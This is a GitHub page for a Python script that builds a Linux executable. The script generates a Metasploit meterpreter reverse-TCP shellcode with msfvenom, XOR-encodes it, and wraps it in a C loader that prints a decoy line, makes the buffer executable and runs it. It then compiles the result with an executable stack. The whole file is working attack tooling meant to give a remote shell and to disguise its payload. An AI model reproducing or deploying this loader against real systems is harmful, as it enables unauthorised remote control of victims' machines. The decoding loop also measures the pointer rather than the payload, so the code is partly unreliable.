-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathgenerate_msf_linux_exe.py
More file actions
executable file
·63 lines (50 loc) · 1.63 KB
/
generate_msf_linux_exe.py
File metadata and controls
executable file
·63 lines (50 loc) · 1.63 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
#!/bin/env python3
from ak import *
import ak
import os
import subprocess
OUT_FILENAME = 'msf-linux-x64'
MSFVENOM_CMD = f"msfvenom -a x64 --platform Linux -p linux/x64/meterpreter/reverse_tcp LHOST={ak.LHOST} LPORT={ak.LPORT} -f raw -e generic/none -b '\\x03' prependfork=true -t 300"
def generate_c(shellcode):
template = """
#define _GNU_SOURCE
#include <sys/mman.h> // for mprotect #include <stdlib.h>
#include <stdio.h>
#include <dlfcn.h>
#include <unistd.h>
int main (int argc, char **argv)
{{
printf("I love programming.");
// system("curl http://192.168.49.65/iran");
unsigned char *buf = "{xor_shellcode}";
char xor_key = '\\x03';
int arraysize = (int) sizeof(buf);
for (int i=0; i<arraysize-1; i++) {{
buf[i] = buf[i]^xor_key;
}}
intptr_t pagesize = sysconf(_SC_PAGESIZE);
if (mprotect((void *)(((intptr_t)buf) & ~(pagesize - 1)),
pagesize, PROT_READ|PROT_EXEC))
{{
perror("mprotect");
return -1;
}}
int (*ret)() = (int(*)())buf;
ret();
return 0;
}}
""".format(xor_shellcode=shellcode.get_hex_c())
print(template)
return template
def compile_c(c):
p = subprocess.Popen(['gcc', '-x', 'c', '-o', OUT_FILENAME, '-','-z','execstack'], stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.STDOUT)
output = p.stdin.write(str.encode(c))
p.stdin.close()
print(p.stdout.readline())
os.chmod(OUT_FILENAME, 0o755)
print("Wrote " + OUT_FILENAME)
def main():
shellcode = ShellCode(MSFVENOM_CMD, b'\x03')
compile_c(generate_c(shellcode))
if __name__ == "__main__":
main()